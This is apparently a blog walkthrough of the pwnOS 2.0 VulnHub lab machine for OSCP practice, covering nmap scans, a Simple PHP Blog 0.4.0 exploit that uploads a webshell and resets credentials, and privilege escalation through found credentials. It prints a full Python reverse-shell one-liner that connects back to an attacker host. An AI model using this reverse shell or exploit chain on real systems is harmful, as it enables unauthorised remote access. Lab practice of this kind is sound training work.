The machine

This machine is one of the machines from the OSCP preparation guide I received from one of my teachers. This machine is the next on list and it can be downloaded on: vulnhub

So for this machine we had to set our vmware NAT adapter to a Host only network within the 10.10.10.0/24 network and because the machine itself has the IP 10.10.10.100/24.

The challenge

The challenge or goal of the machine lists the following:

Get root… Win!

https://www.vulnhub.com/entry/pwnos-20-pre-release,34/

Walk-through

The walk-through will be divided in a couple sections following the standard penetration testing process: Information gathering –> Exploitation –> Post exploitation. It could be divided into more steps, but for complicity we do these three.

Information gathering

To start of we will find the IP address of the machine with nmap since netdiscover takes a while on my VMware. We will use the command sudo nmap -sn 10.0.0.0/24 for this. The vulnerable machine has the IP 10.10.10.100.

So to start of the machine we scan the machine for open ports with nmap. We will do two scans; sudo nmap -sV -sC 10.10.10.100 -oA nmap and sudo nmap -sV -sC -p- 10.10.10.100 -oA fullnmap. We use these parameters for;
-sV service and version enumeration,
-sC is for basic script usage.
-p- to do a full port scan.
-oA to save all output to a couple different files.

The nmap results are;

So we only got port 22 and port 80, so i’m 99% sure we have to abuse the web app. I started a directory bruteforcer and web vulnerability scan before we go through the website in our browser. Below are the results

In 10.10.10.100/blog/config/password.txt we found a password: $1$weWj5iAZ$NU4CkeZ9jNtcP/qrPC69a/
In the source code on /blog/ we found the following:

<meta name="generator" content="Simple PHP Blog 0.4.0" />

Exploitation

Seems like there are multiple exploit available for the Simple PHP blog. We see a metasploit module which we wont use.

I checked what this script can do and it gave me the following description:

So after running the available perl script we could upload a simple webshell in the /blog/images/ directory.

And we got code execution:

But before we do a reverse shell I want to set the username and password to test/test with perl 1191.pl -h http://10.10.10.100/blog -e 3 -U test -P test.

We are able to login! But we already got code execution, so I popped a shell:

There is no netcat on the machine, but there is python. So this python reverse shell did it for me: python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.10.128",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'.

Privilege escalation

I checked for SUIT bits but there were none set, to make our life a bit easier. We run linpeas.sh by downloading it from our Kali machine.

I will go through the interesting output from linpeas in the screenshot below
mysqld running as root

There is a mysql user, but mysql is not running as it, while the mysql user has superuser permissions?

Possible mysql login credentials

Seem like we found the mysql credentials:

Confirmed mysql is running as root:

But i’m not able to login to the mysql database with the found credentials. After looking further I found another set of credentials:

ooh, while we could log in with these credentials as the root user:

But we could probably also exploit the mysql service since we are able to login on the sql server.

Flag

Leave a Reply

Your email address will not be published. Required fields are marked *